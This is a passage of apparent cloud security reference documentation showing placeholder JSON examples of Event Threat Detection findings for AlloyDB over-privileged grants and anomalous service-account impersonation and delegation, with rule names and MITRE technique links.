    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resource_name": "//alloydb.googleapis.com/projects/PROJECT_ID/locations/REGION/clusters/CLUSTER/instances/INSTANCE_NAME",
    "state": "ACTIVE",
    "category": "Privilege Escalation: AlloyDB Over-Privileged Grant",
    "sourceProperties": {
      "sourceId": {
        "projectNumber": "PROJECT_NUMBER",
        "customerOrganizationNumber": "ORGANIZATION_ID"
      },
      "detectionCategory": {
        "ruleName": "alloydb_user_granted_all_permissions"
      },
      "detectionPriority": "LOW",
      "affectedResources": [
        { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" },
        { "gcpResourceName": "//alloydb.googleapis.com/projects/PROJECT_ID/locations/REGION/clusters/CLUSTER/instances/INSTANCE_NAME" }
      ],
      "evidence": [
        {
          "sourceLogId": {
            "projectId": "PROJECT_ID",
            "resourceContainer": "projects/PROJECT_ID",
            "timestamp": {
              "seconds": "0",
              "nanos": 0.0
            },
            "insertId": "INSERT_ID"
          }
        }
      ],
      "findingId": "FINDING_ID",
      "contextUris": {
        "mitreUri": {
          "displayName": "MITRE Link",
          "url": "https://attack.mitre.org/techniques/T1078/001/"
        },
        "cloudLoggingQueryUri": [
          {
            "displayName": "Cloud Logging Query Link",
            "url": "LOGGING_LINK"
          }
        ]
      }
    },
    "eventTime": "EVENT_TIMESTAMP",
    "createTime": "CREATE_TIMESTAMP",
    "severity": "LOW",
    "workflowState": "NEW",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "mute": "UNDEFINED",
    "findingClass": "THREAT",
    "mitreAttack": {
      "primaryTactic": "PRIVILEGE_ESCALATION",
      "primaryTechniques": [
        "VALID_ACCOUNTS"
      ],
      "additionalTactics": [
        "PERSISTENCE"
      ],
      "additionalTechniques": [
        "ACCOUNT_MANIPULATION"
      ]
    },
    "database": {
      "displayName": "DATABASE_NAME",
      "userName": "USER_NAME",
      "query": "QUERY",
      "grantees": ["GRANTEE"]
    },
    "access": {
      "serviceName": "alloydb.googleapis.com",
      "methodName": "alloydb.instances.query"
    }
  },
  "resource": {
    "name": "//alloydb.googleapis.com/projects/PROJECT_ID/locations/REGION/clusters/CLUSTER/instances/INSTANCE_NAME",
    "displayName": "projects/PROJECT_ID/locations/REGION/clusters/CLUSTER/instances/INSTANCE_NAME",
    "type": "google.alloydb.Instance",
    "cloudProvider": "GOOGLE_CLOUD_PLATFORM",
    "service": "alloydb.googleapis.com",
    "location": "REGION",
    "gcpMetadata": {
      "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
      "projectDisplayName": "PROJECT_ID",
      "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
      "parentDisplayName": "PROJECT_ID",
      "folders": [
        {
          "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",
          "resourceFolderDisplayName": "FOLDER_NAME"
        }
      ],
      "organization": "organizations/ORGANIZATION_ID"
    },
    "resourcePath": {
      "nodes": [
        {
          "nodeType": "GCP_PROJECT",
          "id": "projects/PROJECT_NUMBER",
          "displayName": "PROJECT_ID"
        },
        {
          "nodeType": "GCP_FOLDER",
          "id": "folders/FOLDER_NUMBER",
          "displayName": "FOLDER_NAME"
        },
        {
          "nodeType": "GCP_ORGANIZATION",
          "id": "organizations/ORGANIZATION_ID"
        }
      ]
    },
    "resourcePathString": "organizations/ORGANIZATION_ID/folders/FOLDER_NUMBER/projects/PROJECT_NUMBER"
  }
}

Privilege Escalation: Anomalous Impersonation of Service Account for Admin Activity

{
  "findings": {
    "access": {
      "principalEmail": "PRINCIPAL_EMAIL",
      "callerIp": "IP_ADDRESS",
      "callerIpGeo": {},
      "serviceName": "storage.googleapis.com",
      "methodName": "storage.buckets.list",
      "serviceAccountDelegationInfo": [
        { "principalEmail": "PRINCIPAL_EMAIL" },
        { "principalEmail": "PRINCIPAL_EMAIL" }
      ]
    },
    "assetDisplayName": "PROJECT_ID",
    "assetId": "organizations/ORGANIZATION_ID/assets/ASSET_ID",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "category": "Privilege Escalation: Anomalous Impersonation of Service Account for Admin Activity",
    "cloudDlpInspection": {},
    "contacts": {
      "security": {
        "contacts": [
          { "email": "EMAIL_ADDRESS" }
        ]
      }
    },
    "createTime": "2023-02-09T03:26:04.611Z",
    "database": {},
    "eventTime": "2023-02-09T03:26:05.403Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "mitreAttack": {
      "primaryTactic": "INITIAL_ACCESS",
      "primaryTechniques": [
        "VALID_ACCOUNTS"
      ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "severity": "MEDIUM",
    "sourceDisplayName": "Event Threat Detection",
    "state": "ACTIVE",
    "vulnerability": {},
    "workflowState": "NEW"
  },
  "resource": {
    "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "display_name": "PROJECT_ID",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID",
    "parent_display_name": "ORGANIZATION",
    "type": "google.cloud.resourcemanager.Project",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_ID"
    },
    "detectionCategory": {
      "ruleName": "anomalous_sa_delegation_impersonation_of_sa_admin_activity"
    },
    "detectionPriority": "MEDIUM",
    "affectedResources": [
      { "gcpResourceName": "//storage.googleapis.com/" },
      { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": {
            "seconds": "1675913160",
            "nanos": 929341814
          },
          "insertId": "o5ii7hddddd"
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1078/"
      }
    }
  }
}

Privilege Escalation: Anomalous Impersonation of Service Account for AI Admin Activity

{
  "findings": {
    "access": {
      "principalEmail": "PRINCIPAL_EMAIL",
      "callerIp": "IP_ADDRESS",
      "callerIpGeo": {},
      "serviceName": "aiplatform.googleapis.com",
      "methodName": "METHOD_NAME",
      "serviceAccountDelegationInfo": [
        { "principalEmail": "PRINCIPAL_EMAIL" },
        { "principalEmail": "PRINCIPAL_EMAIL" }
      ]
    },
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "category": "Privilege Escalation: Anomalous Impersonation of Service Account for AI Admin Activity",
    "cloudDlpInspection": {},
    "contacts": {
      "security": {
        "contacts": [
          { "email": "EMAIL_ADDRESS" }
        ]
      }
    },
    "createTime": "2023-02-09T03:26:04.611Z",
    "database": {},
    "eventTime": "2023-02-09T03:26:05.403Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "mitreAttack": {
      "primaryTactic": "PRIVILEGE_ESCALATION",
      "primaryTechniques": [
        "VALID_ACCOUNTS"
      ]
    },
    "muteInfo": {
      "staticMute": {
        "state": "UNDEFINED",
        "applyTime": "1970-01-01T00:00:00Z"
      }
    },
    "domains": [
      { "category": "AI" },
      { "category": "IDENTITY_AND_ACCESS" }
    ],
    "aiModel": {
      "name": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME",
      "deploymentPlatform": "VERTEX_AI"
    },
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME",
    "severity": "MEDIUM",
    "state": "ACTIVE",
    "vulnerability": {},
    "workflowState": "NEW"
  },
  "resource": {
    "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "displayName": "projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME",
    "gcpMetadata": {
      "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
      "projectDisplayName": "PROJECT_ID",
      "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
      "parentDisplayName": "PROJECT_ID",
      "organization": "organizations/ORGANIZATION_ID"
    },
    "type": "google.aiplatform.Model",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_ID"
    },
    "detectionCategory": {
      "ruleName": "ai_anomalous_sa_delegation_impersonation_of_sa_admin_activity"
    },
    "detectionPriority": "MEDIUM",
    "affectedResources": [
      { "gcpResourceName": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME" },
      { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": {
            "seconds": "1675913160",
            "nanos": 929341814
          },
          "insertId": "o5ii7hddddd"
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1078/"
      }
    }
  }
}

Privilege Escalation: Anomalous Multistep Service Account Delegation for Admin Activity

{
  "findings": {
    "access": {
      "principalEmail": "PRINCIPAL_EMAIL",
      "callerIp": "IP_ADDRESS",
      "callerIpGeo": {},
      "serviceName": "storage.googleapis.com",
      "methodName": "storage.buckets.list",
      "serviceAccountDelegationInfo": [
        { "principalEmail": "PRINCIPAL_EMAIL" },
        { "principalEmail": "PRINCIPAL_EMAIL" },
        { "principalEmail": "PRINCIPAL_EMAIL" }
      ]
    },
    "assetDisplayName": "PROJECT_ID",
    "assetId": "organizations/ORGANIZATION_ID/assets/ASSET_ID",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "category": "Privilege Escalation: Anomalous Multistep Service Account Delegation for Admin Activity",
    "cloudDlpInspection": {},
    "contacts": {
      "security": {
        "contacts": [
          { "email": "EMAIL_ADDRESS" }
        ]
      }
    },
    "createTime": "2023-02-09T03:26:04.611Z",
    "database": {},
    "eventTime": "2023-02-09T03:26:05.403Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "mitreAttack": {
      "primaryTactic": "INITIAL_ACCESS",
      "primaryTechniques": [
        "VALID_ACCOUNTS"
      ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "severity": "MEDIUM",
    "sourceDisplayName": "Event Threat Detection",
    "state": "ACTIVE",
    "vulnerability": {},
    "workflowState": "NEW"
  },
  "resource": {
    "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "display_name": "PROJECT_ID",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID",
    "parent_display_name": "ORGANIZATION",
    "type": "google.cloud.resourcemanager.Project",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_ID"
    },
    "detectionCategory": {
      "ruleName": "anomalous_sa_delegation_multistep_admin_activity"
    },
    "detectionPriority": "MEDIUM",
    "affectedResources": [
      { "gcpResourceName": "//storage.googleapis.com/" },
      { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": {
            "seconds": "1675913160",
            "nanos": 929341814
          },
          "insertId": "o5ii7hddddd"
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1078/"
      }
    }
  }
}

Privilege Escalation: Anomalous Multistep Service Account Delegation for AI Admin Activity

{
  "findings": {
    "access": {
      "principalEmail": "PRINCIPAL_EMAIL",
      "callerIp": "IP_ADDRESS",
      "callerIpGeo": {},
      "serviceName": "aiplatform.googleapis.com",
      "methodName": "METHOD_NAME",
      "serviceAccountDelegationInfo": [
        { "principalEmail": "PRINCIPAL_EMAIL" },
        { "principalEmail": "PRINCIPAL_EMAIL" },
        { "principalEmail": "PRINCIPAL_EMAIL" }
      ]
    },
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "category": "Privilege Escalation: Anomalous Multistep Service Account Delegation for AI Admin Activity",
    "cloudDlpInspection": {},
    "contacts": {
      "security": {
        "contacts": [
          { "email": "EMAIL_ADDRESS" }
        ]
      }
    },
    "createTime": "2023-02-09T03:26:04.611Z",
    "database": {},
    "eventTime": "2023-02-09T03:26:05.403Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "mitreAttack": {
      "primaryTactic": "INITIAL_ACCESS",
      "primaryTechniques": [ "VALID_ACCOUNTS" ]
    },
    "muteInfo": {
      "staticMute": {
        "state": "UNDEFINED",
        "applyTime": "1970-01-01T00:00:00Z"
      }
    },
    "domains": [
      { "category": "AI" },
      { "category": "IDENTITY_AND_ACCESS" }
    ],
    "aiModel": {
      "name": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME",
      "deploymentPlatform": "VERTEX_AI"
    },
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME",
    "severity": "MEDIUM",
    "sourceDisplayName": "Event Threat Detection",
    "state": "ACTIVE",
    "vulnerability": {},
    "workflowState": "NEW"
  },
  "resource": {
    "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "displayName": "projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME",
    "gcpMetadata": {
      "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
      "projectDisplayName": "PROJECT_ID",
      "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
      "parentDisplayName": "PROJECT_ID",
      "organization": "organizations/ORGANIZATION_ID"
    },
    "type": "google.aiplatform.Model",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_ID"
    },
    "detectionCategory": { "ruleName": "ai_anomalous_sa_delegation_multistep_admin_activity" },
    "detectionPriority": "MEDIUM",
    "affectedResources": [
      { "gcpResourceName": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME" },
      { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": {
            "seconds": "1675913160",
            "nanos": 929341814
          },
          "insertId": "o5ii7hddddd"
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://atlas.mitre.org/techniques/AML.T0012/"
      }
    }
  }
}

Privilege Escalation: Anomalous Multistep Service Account Delegation for AI Data Access

{
  "findings": {
    "access": {
      "principalEmail": "PRINCIPAL_EMAIL",
      "callerIp": "IP_ADDRESS",
      "callerIpGeo": {},
      "serviceName": "aiplatform.googleapis.com",
      "methodName": "METHOD_NAME",
      "serviceAccountDelegationInfo": [
        { "principalEmail": "PRINCIPAL_EMAIL" },
        { "principalEmail": "PRINCIPAL_EMAIL" },
        { "principalEmail": "PRINCIPAL_EMAIL" }
      ]
    },
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "category": "Privilege Escalation: Anomalous Multistep Service Account Delegation for AI Data Access",
    "cloudDlpInspection": {},
    "contacts": {
      "security": {
        "contacts": [
          { "email": "EMAIL_ADDRESS" }
        ]
      }
    },
    "createTime": "2023-02-09T03:26:04.611Z",
    "database": {},
    "eventTime": "2023-02-09T03:26:05.403Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "mitreAttack": {
      "primaryTactic": "INITIAL_ACCESS",
      "primaryTechniques": [ "VALID_ACCOUNTS" ]
    },
    "muteInfo": {
      "staticMute": {
        "state": "UNDEFINED",
        "applyTime": "1970-01-01T00:00:00Z"
      }
    },
    "domains": [
      { "category": "AI" },
      { "category": "IDENTITY_AND_ACCESS" }
    ],
    "aiModel": {
      "name": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME",
      "deploymentPlatform": "VERTEX_AI"
    },
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME",
    "severity": "MEDIUM",
    "state": "ACTIVE",
    "vulnerability": {},
    "workflowState": "NEW"
  },
  "resource": {
    "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "displayName": "projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME",
    "gcpMetadata": {
      "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
      "projectDisplayName": "PROJECT_ID",
      "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
      "parentDisplayName": "PROJECT_ID",
      "organization": "organizations/ORGANIZATION_ID"
    },
    "type": "google.aiplatform.Model",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_ID"
    },
    "detectionCategory": { "ruleName": "ai_anomalous_sa_delegation_multistep_data_access" },
    "detectionPriority": "MEDIUM",
    "affectedResources": [
      { "gcpResourceName": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME" },
      { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": {
            "seconds": "1675913160",
            "nanos": 929341814
          },
          "insertId": "o5ii7hddddd"
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://atlas.mitre.org/techniques/AML.T0012/"
      }
    }
  }
}

Privilege Escalation: Anomalous Multistep Service Account Delegation for Data Access

{
  "findings": {
    "access": {
      "principalEmail": "PRINCIPAL_EMAIL",
      "callerIp": "IP_ADDRESS",
      "callerIpGeo": {},
      "serviceName": "storage.googleapis.com",
      "methodName": "storage.buckets.list",
      "serviceAccountDelegationInfo": [
        { "principalEmail": "PRINCIPAL_EMAIL" },
        { "principalEmail": "PRINCIPAL_EMAIL" },
        { "principalEmail": "PRINCIPAL_EMAIL" }
      ]
    },
    "assetDisplayName": "PROJECT_ID",
    "assetId": "organizations/ORGANIZATION_ID/assets/ASSET_ID",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "category": "Privilege Escalation: Anomalous Multistep Service Account Delegation for Data Access",
    "cloudDlpInspection": {},
    "contacts": {
      "security": {
        "contacts": [
          { "email": "EMAIL_ADDRESS" }
        ]
      }
    },
    "createTime": "2023-02-09T03:26:04.611Z",
    "database": {},
    "eventTime": "2023-02-09T03:26:05.403Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "mitreAttack": {
      "primaryTactic": "INITIAL_ACCESS",
      "primaryTechniques": [ "VALID_ACCOUNTS" ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "severity": "MEDIUM",
    "sourceDisplayName": "Event Threat Detection",
    "state": "ACTIVE",
    "vulnerability": {},
    "workflowState": "NEW"
  },
  "resource": {
    "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "display_name": "PROJECT_ID",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID",
    "parent_display_name": "ORGANIZATION",
    "type": "google.cloud.resourcemanager.Project",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_ID"
    },
    "detectionCategory": { "ruleName": "anomalous_sa_delegation_multistep_data_access" },
    "detectionPriority": "MEDIUM",
    "affectedResources": [
      { "gcpResourceName": "//storage.googleapis.com/" },
      { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": {
            "seconds": "1675913160",
            "nanos": 929341814
          },
          "insertId": "o5ii7hddddd"
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1078/"
      }
    }
  }
}

Privilege Escalation: Anomalous Service Account Impersonator for Admin Activity

{
  "findings": {
    "access": {
      "principalEmail": "PRINCIPAL_EMAIL",
      "callerIp": "IP_ADDRESS",
      "callerIpGeo": {},
      "serviceName": "storage.googleapis.com",
      "methodName": "storage.buckets.list",
      "serviceAccountDelegationInfo": [
        { "principalEmail": "PRINCIPAL_EMAIL" },
        { "principalEmail": "PRINCIPAL_EMAIL" }
      ]
    },
    "assetDisplayName": "PROJECT_ID",
    "assetId": "organizations/ORGANIZATION_ID/assets/ASSET_ID",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "category": "Privilege Escalation: Anomalous Service Account Impersonator for Admin Activity",
    "cloudDlpInspection": {},
    "contacts": {
      "security": {
        "contacts": [
          { "email": "EMAIL_ADDRESS" }
        ]
      }
    },
    "createTime": "2023-02-09T03:26:04.611Z",
    "database": {},
    "eventTime": "2023-02-09T03:26:05.403Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "mitreAttack": {
      "primaryTactic": "INITIAL_ACCESS",
      "primaryTechniques": [ "VALID_ACCOUNTS" ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "severity": "MEDIUM",
    "sourceDisplayName": "Event Threat Detection",
    "state": "ACTIVE",
    "vulnerability": {},
    "workflowState": "NEW"
  },
  "resource": {
    "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "display_name": "PROJECT_ID",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID",
    "parent_display_name": "ORGANIZATION",
    "type": "google.cloud.resourcemanager.Project",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_ID"
    },
    "detectionCategory": { "ruleName": "anomalous_sa_delegation_impersonator_admin_activity" },
    "detectionPriority": "MEDIUM",
    "affectedResources": [
      { "gcpResourceName": "//storage.googleapis.com/" },
      { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": {
            "seconds": "1675913160",
            "nanos": 929341814
          },
          "insertId": "o5ii7hddddd"
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1078/"
      }
    }
  }
}

Privilege Escalation: Anomalous Service Account Impersonator for AI Admin Activity

{
  "findings": {
    "access": {
      "principalEmail": "PRINCIPAL_EMAIL",
      "callerIp": "IP_ADDRESS",
      "callerIpGeo": {},
      "serviceName": "aiplatform.googleapis.com",
      "methodName": "METHOD_NAME",
      "serviceAccountDelegationInfo": [
        { "principalEmail": "PRINCIPAL_EMAIL" },
        { "principalEmail": "PRINCIPAL_EMAIL" }
      ]
    },
    "assetDisplayName": "PROJECT_ID",
    "assetId": "organizations/ORGANIZATION_ID/assets/ASSET_ID",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "category": "Privilege Escalation: Anomalous Service Account Impersonator for AI Admin Activity",
    "cloudDlpInspection": {},
    "contacts": {
      "security": {
        "contacts": [
          { "email": "EMAIL_ADDRESS" }
        ]
      }
    },
    "createTime": "2023-02-09T03:26:04.611Z",
    "database": {},
    "eventTime": "2023-02-09T03:26:05.403Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "mitreAttack": {
      "primaryTactic": "INITIAL_ACCESS",
      "primaryTechniques": [ "VALID_ACCOUNTS" ]
    },
    "muteInfo": {
      "staticMute": {
        "state": "UNDEFINED",
        "applyTime": "1970-01-01T00:00:00Z"
      }
    },
    "domains": [
      { "category": "AI" },
      { "category": "IDENTITY_AND_ACCESS" }
    ],
    "aiModel": {
      "name": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME",
      "deploymentPlatform": "VERTEX_AI"
    },
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME",
    "severity": "MEDIUM",
    "state": "ACTIVE",
    "vulnerability": {},
    "workflowState": "NEW"
  },
  "resource": {
    "name": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME",
    "displayName": "projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME",
    "gcpMetadata": {
      "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
      "projectDisplayName": "PROJECT_ID",
      "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
      "parentDisplayName": "PROJECT_ID",
      "organization": "organizations/ORGANIZATION_ID"
    },
    "type": "google.aiplatform.Model",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_ID"
    },
    "detectionCategory": { "ruleName": "ai_anomalous_sa_delegation_impersonator_admin_activity" },
    "detectionPriority": "MEDIUM",
    "affectedResources": [
